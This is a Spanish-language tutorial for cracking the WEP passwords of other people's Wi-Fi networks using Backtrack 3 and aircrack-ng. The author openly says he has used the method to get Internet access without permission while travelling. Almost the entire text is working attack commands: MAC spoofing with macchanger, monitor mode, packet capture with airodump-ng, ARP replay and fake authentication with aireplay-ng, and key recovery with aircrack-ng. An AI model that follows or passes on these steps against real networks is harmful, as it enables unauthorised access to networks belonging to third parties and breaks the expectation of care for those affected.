Está en la página 1de 4

El hackeo o robo de contraseñas de redes inalámbricas o Wi-Fi es

muy común hoy en día, en muchos casos el acceso es realmente fácil,


en otros mas complejos, yo mismo lo he realizado en algunas
ocasiones para obtener Internet cuando realizo viajes con la
notebook, en esta ocasión les voy a explicar un pequeño tutorial
sobre Backtrack 3 y como obtener contraseñas de una red Wi-Fi con
encriptación WEP.

Pasos a seguir:

- En primer lugar deberemos descargar Backtrack 3 —-> Enlace de


descarga (695 MB).
- Grabamos el software en un CD, reiniciamos la PC y colocamos el CD
para que arranque Backtrack 3.
- Debemos abrir la consola (Shell), si conoces Linux estarás
familiarizado con el termino.
- Tenemos que desactivar la tarjeta de red con el comando airmon-ng
stop ath0, donde ath0 es el nombre de la placa, en este caso es
altheros.

- Hay que cambiar la MAC, para ello escribimos: macchanger -m


11:22:33:44:55:66 wifi0.

- Arrancamos nuestra placa de red en modo monitor y escribimos:


airmon-ng start wifi0.
- Escribimos: iwconfig para comprobar que todo lo que hicimos esta
realizado correctamente.

- Revisamos si hay redes en nuestra área de cobertura, para ello


escribimos: airodump-ng wifi0.

- Ahora lo importante de la imagen anterior es la MAC de la red


(BSSID), el canal por donde se transmite la red Wi-Fi (CH), y el
nombre de la red (ESSID).
Para detener la búsqueda de redes presionamos CTRL + C y
escribimos los siguiente: airodump-ng –channel X –write XXX ath0. La
“X” en channel se reemplaza por 5 en este caso y la “XXX”es el
nombre con que guardamos la información, puede colocarse
cualquier nombre.
- Abrimos otra ventana de Shell y escribimos: aireplay-ng -3 -b (mac
de la red) -h (nuestra mac) ath0.

- Nuevamente abrimos otra ventana de shell y escribimos: aireplay-ng


-1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0.

- Bueno finalmente deberemos ser pacientes y esperar que los ARP


sean altos (50.000), para así poder obtener la contraseña. Cuando
tengamos suficiente datos para poder descifrar la password (lleva
tiempo y experiencia), cerramos todos los Shell y escribimos:
Aircrack-ng pass-01.cap, con esto descifraremos la contraseña
encriptada.